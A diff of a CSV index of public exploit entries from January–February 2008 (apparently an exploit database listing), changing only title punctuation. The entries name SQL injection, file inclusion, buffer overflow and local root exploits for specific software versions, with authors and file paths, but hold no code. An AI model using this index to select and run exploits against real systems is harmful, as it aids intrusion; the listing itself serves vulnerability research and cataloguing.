+4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 ExecuteStr() Remote Command Execution Exploit",2008-01-23,h07,windows,remote,0 4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0 4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0 4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Remote Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0 4978,platforms/hardware/dos/4978.html,"Apple iPhone 1.1.2 - Remote Denial of Service Exploit",2008-01-24,c0ntex,hardware,dos,0 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control Buffer Overflow Exploit",2008-01-24,Elazar,windows,remote,0 -4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 (optimizer.php files) Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 +4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - (optimizer.php files) Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 FileUploader Class InsecureMethod PoC",2008-01-24,rgod,windows,remote,0 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch ActiveX Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - Remote SQL Injection",2008-01-25,0in,php,webapps,0 -4985,platforms/php/webapps/4985.txt,"flinx <= 1.3 (category.php id) Remote SQL Injection",2008-01-25,Houssamix,php,webapps,0 +4985,platforms/php/webapps/4985.txt,"flinx <= 1.3 - (category.php id) Remote SQL Injection",2008-01-25,Houssamix,php,webapps,0 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 AddFile() Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 @@ -4639,34 +4639,34 @@ id,file,description,date,author,platform,type,port 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)",2008-01-28,sh2kerr,multiple,dos,0 4998,platforms/windows/local/4998.c,"IrfanView 4.10 - (.fpx) Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 -4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 -5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 +4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 +5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 dispatcher.php Remote File Disclosure Vulnerabilities",2008-01-28,Stack,php,webapps,0 5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 pollid Remote SQL Injection",2008-01-29,D4m14n,php,webapps,0 -5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 +5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 5004,platforms/windows/local/5004.c,"Safenet IPSecDrv.sys <= 10.4.0.12 - Local kernel ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 -5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 -5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 (parser.php file) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 +5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 +5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php file) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 5007,platforms/php/webapps/5007.txt,"Mambo Component Newsletter (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 5008,platforms/php/webapps/5008.txt,"Mambo Component Fq (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 (catid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - (catid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes (aid) Remote SQL Injection",2008-01-30,S@BUN,php,webapps,0 5012,platforms/php/webapps/5012.pl,"Connectix Boards <= 0.8.2 template_path Remote File Inclusion Exploit",2008-01-30,Houssamix,php,webapps,0 5013,platforms/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - adclick.php SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 -5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 (id) Remote SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 (cat) SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - (id) Remote SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 - (cat) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - Remote SQL Injection",2008-01-30,S@BUN,php,webapps,0 5017,platforms/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 5018,platforms/php/webapps/5018.pl,"ibProArcade <= 3.3.0 - Remote SQL Injection Exploit",2008-01-30,RST/GHC,php,webapps,0 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 - RFI Vulnerabilities",2008-01-30,Crackers_Child,php,webapps,0 -5021,platforms/php/webapps/5021.txt,"PHP Links <= 1.3 (vote.php id) Remote SQL Injection",2008-01-30,Houssamix,php,webapps,0 +5021,platforms/php/webapps/5021.txt,"PHP Links <= 1.3 - (vote.php id) Remote SQL Injection",2008-01-30,Houssamix,php,webapps,0 5022,platforms/php/webapps/5022.txt,"PHP Links <= 1.3 smarty.php Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 5025,platforms/windows/remote/5025.html,"MySpace Uploader (MySpaceUploader.ocx 1.0.0.4) BoF Exploit",2008-01-31,Elazar,windows,remote,0 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion Vulnerabilities",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure Vulnerabilities",2008-01-31,muuratsalo,php,webapps,0 -5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 +5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b SQL Injection",2008-01-31,S@BUN,php,webapps,0 5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 SQL Injection",2008-01-31,S@BUN,php,webapps,0 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - Remote SQL Injection",2008-01-31,S@BUN,php,webapps,0 @@ -4674,17 +4674,17 @@ id,file,description,date,author,platform,type,port 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 cp_upload_image.php Remote File Upload",2008-02-01,Omni,php,webapps,0 5034,platforms/php/webapps/5034.txt,"Joomla Component NeoReferences 1.3.1 - (catid) SQL Injection",2008-02-01,S@BUN,php,webapps,0 5035,platforms/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 -5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 (USER/PASS) Remote Heap Overflow PoC",2008-02-02,securfrog,windows,dos,0 +5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 - (USER/PASS) Remote Heap Overflow PoC",2008-02-02,securfrog,windows,dos,0 5037,platforms/php/webapps/5037.txt,"The Everything Development System <= Pre-1.0 - SQL Injection",2008-02-02,sub,php,webapps,0 5039,platforms/php/webapps/5039.txt,"WordPress Plugin Wordspew - Remote SQL Injection",2008-02-02,S@BUN,php,webapps,0 -5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 (topicid) Remote SQL Injection",2008-02-02,S@BUN,php,webapps,0 +5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - (topicid) Remote SQL Injection",2008-02-02,S@BUN,php,webapps,0 5041,platforms/php/webapps/5041.txt,"phpShop <= 0.8.1 - Remote SQL Injection / Filter Bypass Vulnerabilities",2008-02-02,"the redc0ders",php,webapps,0 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-02,"Khashayar Fereidani",php,webapps,0 5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF PoC Exploit",2008-02-02,h07,windows,dos,0 5044,platforms/windows/dos/5044.pl,"IpSwitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow PoC",2008-02-03,securfrog,windows,dos,0 5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll ActiveX BoF Exploit",2008-02-03,plan-s,windows,remote,0 5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF Exploit",2008-02-03,anonymous,windows,remote,0 -5047,platforms/php/webapps/5047.txt,"Joomla Component mosDirectory 2.3.2 (catid) SQL Injection",2008-02-03,GoLd_M,php,webapps,0 +5047,platforms/php/webapps/5047.txt,"Joomla Component mosDirectory 2.3.2 - (catid) SQL Injection",2008-02-03,GoLd_M,php,webapps,0 5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF Exploit (2)",2008-02-03,exceed,windows,remote,0 5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader (ImageUploader4.ocx 4.5.57.0) BoF Exploit",2008-02-03,Elazar,windows,remote,0 5050,platforms/php/webapps/5050.pl,"A-Blog 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-03,"Khashayar Fereidani",php,webapps,0 @@ -4693,23 +4693,23 @@ id,file,description,date,author,platform,type,port 5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - Remote SQL Injection",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS <= 3.2 SNMPd snmp-set Denial of Service Exploit",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 -5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection",2008-02-04,QTRinux,php,webapps,0 +5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) Remote SQL Injection",2008-02-04,QTRinux,php,webapps,0 5057,platforms/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting Vulnerabilities",2008-02-04,DSecRG,php,webapps,0 -5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom <= 0.3.2 (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 -5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 (Itemid) Remote SQL Injection",2008-02-04,S@BUN,php,webapps,0 -5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 (index.php page) Local File Inclusion",2008-02-04,DSecRG,php,webapps,0 +5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom <= 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - (Itemid) Remote SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 - (index.php page) Local File Inclusion",2008-02-04,DSecRG,php,webapps,0 5061,platforms/php/webapps/5061.txt,"All Club CMS <= 0.0.1f index.php Local File Inclusion",2008-02-04,Trancek,php,webapps,0 -5062,platforms/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 (images.php id) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 +5062,platforms/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - (images.php id) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 5063,platforms/windows/dos/5063.pl,"NERO Media Player <= 1.4.0.35b M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5064,platforms/php/webapps/5064.txt,"All Club CMS <= 0.0.2 index.php Remote SQL Injection",2008-02-05,ka0x,php,webapps,0 -5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 (pic) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 +5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 - (pic) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities",2008-02-06,Trancek,php,webapps,0 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 5070,platforms/php/webapps/5070.pl,"MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit",2008-02-06,F,php,webapps,0 5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - (link_id) SQL Injection",2008-02-06,you_kn0w,php,webapps,0 -5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 (id) Remote SQL Injection",2008-02-06,Crackers_Child,php,webapps,0 +5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 - (id) Remote SQL Injection",2008-02-06,Crackers_Child,php,webapps,0 5073,platforms/php/webapps/5073.txt,"Mambo Component com_downloads Remote SQL Injection",2008-02-06,S@BUN,php,webapps,0 5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download (Username) Blind SQL Injection Exploit",2008-02-06,Moubik,php,webapps,0 5075,platforms/php/webapps/5075.txt,"osCommerce Addon Customer Testimonials 3.1 - SQL Injection",2008-02-07,"it's my",php,webapps,0 @@ -4726,58 +4726,58 @@ id,file,description,date,author,platform,type,port 5086,platforms/windows/dos/5086.html,"ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow PoC",2008-02-08,Trancek,windows,dos,0 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit",2008-02-09,rgod,windows,remote,0 5088,platforms/php/webapps/5088.py,"Limbo CMS <= 1.0.4.2 Cuid cookie Blind SQL Injection Exploit",2008-02-09,The:Paradox,php,webapps,0 -5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 (index.php page) Local File Inclusion",2008-02-09,Houssamix,php,webapps,0 -5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 -5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 +5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 - (index.php page) Local File Inclusion",2008-02-09,Houssamix,php,webapps,0 +5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 +5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0 5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection",2008-02-09,CheebaHawk215,php,webapps,0 5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0 -5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection",2008-02-10,"SoSo H H",php,webapps,0 -5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 -5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 +5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 - (detail.php item_id) SQL Injection",2008-02-10,"SoSo H H",php,webapps,0 +5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 +5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 5099,platforms/php/webapps/5099.php,"Mix Systems CMS (parent/id) Remote SQL Injection Exploit",2008-02-10,halkfild,php,webapps,0 5100,platforms/windows/remote/5100.html,"ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX BoF Exploit",2008-02-10,Elazar,windows,remote,0 -5101,platforms/php/webapps/5101.pl,"vKios <= 2.0.0 (products.php cat) Remote SQL Injection Exploit",2008-02-12,NTOS-Team,php,webapps,0 +5101,platforms/php/webapps/5101.pl,"vKios <= 2.0.0 - (products.php cat) Remote SQL Injection Exploit",2008-02-12,NTOS-Team,php,webapps,0 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader <= 5.0.14.0 - Remote Buffer Overflow Exploit",2008-02-12,"MC Group Ltd. ",windows,remote,0 5103,platforms/php/webapps/5103.txt,"Joomla Component rapidrecipe <= 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess <= 0.8 - Remote SQL Injection",2008-02-12,S@BUN,php,webapps,0 -5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0 +5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap BoF Exploit",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 -5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection",2008-02-13,S@BUN,php,webapps,0 +5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 - (aid) Remote SQL Injection",2008-02-13,S@BUN,php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware <= 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - XSS / SQL Injection Exploit",2008-02-14,"Khashayar Fereidani",php,webapps,0 -5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 (threads.php ssid) SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 +5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - (threads.php ssid) SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0 -5117,platforms/php/webapps/5117.txt,"Joomla Component paxxgallery 0.2 (iid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 +5117,platforms/php/webapps/5117.txt,"Joomla Component paxxgallery 0.2 - (iid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5118,platforms/php/webapps/5118.txt,"Joomla Component MCQuiz 0.9 Final (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 -5119,platforms/php/webapps/5119.txt,"Joomla Component Quiz <= 0.81 (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 +5119,platforms/php/webapps/5119.txt,"Joomla Component Quiz <= 0.81 - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5120,platforms/php/webapps/5120.pl,"Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit",2008-02-14,Inphex,php,webapps,0 5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote / Local File Inclusion Vulnerabilities",2008-02-14,MhZ91,php,webapps,0 5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 M3U File Remote Buffer Overflow PoC",2008-02-14,securfrog,windows,dos,0 -5123,platforms/php/webapps/5123.txt,"Scribe <= 0.2 (index.php page) Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 +5123,platforms/php/webapps/5123.txt,"Scribe <= 0.2 - (index.php page) Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 5125,platforms/php/webapps/5125.txt,"PHP Live! <= 3.2.2 - (questid) Remote SQL Injection (1)",2008-02-14,Xar,php,webapps,0 5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0-2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 -5128,platforms/php/webapps/5128.txt,"Mambo Component Quran <= 1.1 (surano) SQL Injection",2008-02-15,Don,php,webapps,0 -5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 (download.php) Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0 +5128,platforms/php/webapps/5128.txt,"Mambo Component Quran <= 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0 +5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - (download.php) Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple Remote SQL Injection Exploit",2008-02-16,NTOS-Team,php,webapps,0 -5131,platforms/php/webapps/5131.pl,"Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit",2008-02-16,JosS,php,webapps,0 +5131,platforms/php/webapps/5131.pl,"Simple CMS <= 1.0.3 - (indexen.php area) Remote SQL Injection Exploit",2008-02-16,JosS,php,webapps,0 5132,platforms/php/webapps/5132.txt,"Joomla Component jooget <= 2.6.8 - Remote SQL Injection",2008-02-16,S@BUN,php,webapps,0 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - Remote SQL Injection",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria Remote SQL Injection",2008-02-16,S@BUN,php,webapps,0 5135,platforms/php/webapps/5135.txt,"WordPress Photo album Remote - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Remote File Upload",2008-02-17,ZoRLu,php,webapps,0 -5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 (Download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 +5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (Download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla Component astatsPRO 1.0 refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 -5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 (categoryId) SQL Injection",2008-02-18,"it's my",php,webapps,0 -5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 (username) Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 +5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 - (categoryId) SQL Injection",2008-02-18,"it's my",php,webapps,0 +5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - (username) Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - (list) Local Kernel Memory Leak PoC",2008-02-18,mu-b,windows,local,0 5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - DLMFENC.sys Local Kernel ring0 link list zero PoC",2008-02-18,mu-b,windows,dos,0 5143,platforms/windows/local/5143.c,"DESlock+ <= 3.2.6 - Local Kernel ring0 link list zero SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 @@ -4796,20 +4796,20 @@ id,file,description,date,author,platform,type,port 5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces (cid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos (cid) Remote SQL Injection",2008-02-19,S@BUN,php,webapps,0 5158,platforms/php/webapps/5158.txt,"XOOPS Module classifieds (cid) Remote SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 +5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - (okulid) Remote SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 5160,platforms/php/webapps/5160.txt,"Joomla Component com_hwdvideoshare SQL Injection",2008-02-20,S@BUN,php,webapps,0 5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum (artid) SQL Injection",2008-02-20,DamaR,php,webapps,0 -5162,platforms/php/webapps/5162.txt,"Globsy 1.0 (file) Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0 +5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - (file) Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0 5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt (cid) SQL Injection",2008-02-20,Crackers_Child,php,webapps,0 5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Remote Blind SQL Injection Exploit",2008-02-20,NBBN,php,webapps,0 5165,platforms/php/webapps/5165.php,"PunBB <= 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 -5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 (productdetails.php) Remote SQL Injection Exploit",2008-02-20,t0pP8uZz,php,webapps,0 +5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) Remote SQL Injection Exploit",2008-02-20,t0pP8uZz,php,webapps,0 5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs <= 1.0.2-3.1 - Local Race Condition Exploit",2008-02-21,vl4dZ,linux,local,0 